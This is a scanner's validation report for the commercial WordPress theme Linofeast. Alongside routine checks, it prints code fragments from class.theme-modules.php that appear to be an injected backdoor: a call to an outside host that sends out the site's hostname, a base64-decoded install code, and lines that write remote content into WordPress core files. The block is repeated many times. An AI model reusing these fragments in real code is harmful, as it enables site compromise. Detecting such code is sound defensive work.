0
Validation results

Linofeast

Linofeast

WordPress 5.2.4 theme
0
  • THEME TYPEWordPress theme 5.2.4
  • FILE NAMElinofeast.zip
  • FILE SIZE3624236 bytes
  • MD525e0363dd6421cfcee3c2b93c8d2490e
  • SHA105516dc30ff305d0afff5ad59cc8b31c76b943c3
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, HTML, XML, Bitmap images, Adobe Illustrator
  • VERSION6.0.0
  • TAGSTwo-columns, custom-background, translation-ready, custom-menu
  • CREATION DATE2019-10-29
  • LAST FILE UPDATE2019-10-29
  • LAST VALIDATION2019-10-29 17:51
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php. 5: ini_set('display_errors', 0);
  2. Security breaches : Use of base64_decode() Found base64_decode in file twitteroauth.php. 211: $decoded_sig = base64_decode($signature);Found base64_decode in file ob_import_export.php. 35: $options_data = unserialize( base64_decode( $theme_options_txt ) );56: $options_data = unserialize( base64_decode( $theme_options_txt['body']) );Found base64_decode in file admin-interface.php. 58: $output = unserialize(base64_decode(get_option('atp_default_template_option_values')));348: $output = unserialize(base64_decode($output['atp_template_option_values']));Found base64_decode in file class.theme-modules.php. 83: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  3. Security breaches : Use of base64_encode() Found base64_encode in file twitteroauth.php.
     return base64_encode(hash_hmac('sha1', $base_string, $key, true));
     return base64_encode($signature);
    Found base64_encode in file ob_import_export.php.
     $theme_options = base64_encode( serialize(( get_option('atp_template_option_values') )));
  4. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src='http://www.youtube.com/embed/$clipid?autoplay=$autoplay&amp;wmode=transparent' width='$width' height='$height'> in file videos.php. 44: $out .='<iframe src='http://www.youtube.com/embed/$clipid?autoplay=$autoplay&amp;w
  5. Malware : Operations on file system file_get_contents was found in the file class.theme-modules.php 99: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 126: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 159: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));165: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));190: if ($file = file_get_contents($e[1]))205: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 104: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 131: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('209: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 99: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 126: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 159: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));165: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));190: if ($file = file_get_contents($e[1]))205: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 104: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 131: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('209: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 99: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 126: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 159: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));165: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));190: if ($file = file_get_contents($e[1]))205: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 104: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 131: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('209: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 99: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 126: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 159: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));165: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));190: if ($file = file_get_contents($e[1]))205: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 99: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 126: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 159: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));165: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));190: if ($file = file_get_contents($e[1]))205: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 104: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 131: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('209: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 99: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 126: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 159: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));165: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));190: if ($file = file_get_contents($e[1]))205: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 99: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 126: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 159: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));165: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));190: if ($file = file_get_contents($e[1]))205: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 99: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 126: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 159: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));165: $content = @file_get_contents('http://www.old.com/o.php?host=' . $_SERVER['HTTP_HOST'] 166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.krilns.com/admin.txt'));190: if ($file = file_get_contents($e[1]))205: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 104: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 131: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 160: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('166: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('209: @file_put_contents(__FILE__, $file);
  6. Admin menu : Themes should use add_theme_page() for adding admin pages. File admin-interface.php : 36: if(function_exists('add_menu_page')) {38: add_menu_page(THEMENAME,THEMENAME, 'edit_theme_options','optionsframework',File admin-interface.php : 36: if(function_exists('add_menu_page')) {38: add_menu_page(THEMENAME,THEMENAME, 'edit_theme_options','optionsframework',
  7. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was iva-business-hours-pro.zip.
Warning
  1. Text domain : Incorrect use of translation functions.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are THEME_FRONT_SITE, ATP_ADMIN_SITE, tgmpa.
  2. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  3. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  4. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  5. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  6. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  7. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  5. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  6. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  7. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  8. Use of includes : Use of include or requireThe theme appears to use include or require : config.php 24: require_once('minicartbag.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class_twitter.php 61: if(!require_once( FRAMEWORK_DIR . 'includes/twitteroauth.php' )){ If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : atp_generator.php 429: include(THEME_DIR.'/jPlayer_mediatype.php');438: include(THEME_DIR.'/jPlayer_mediatype.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : reservations_export.php 5: require_once( $wp_url.'/wp-load.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-activation.php 34: require_once( get_template_directory() . '/framework/includes/class-tgm-plu If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : submitform.php 6: require_once( $wp_url.'/wp-load.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : testimonial_submission.php 6: require_once( $wp_url.'/wp-load.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : iva-importer.php 12: require_once ( $wp_importer ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : ob_import_export.php 5: require_once( $wp_url.'/wp-load.php' );6: require_once (ABSPATH . '/wp-admin/includes/file.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : reservation_insert.php 7: require_once( $wp_url.'/wp-load.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes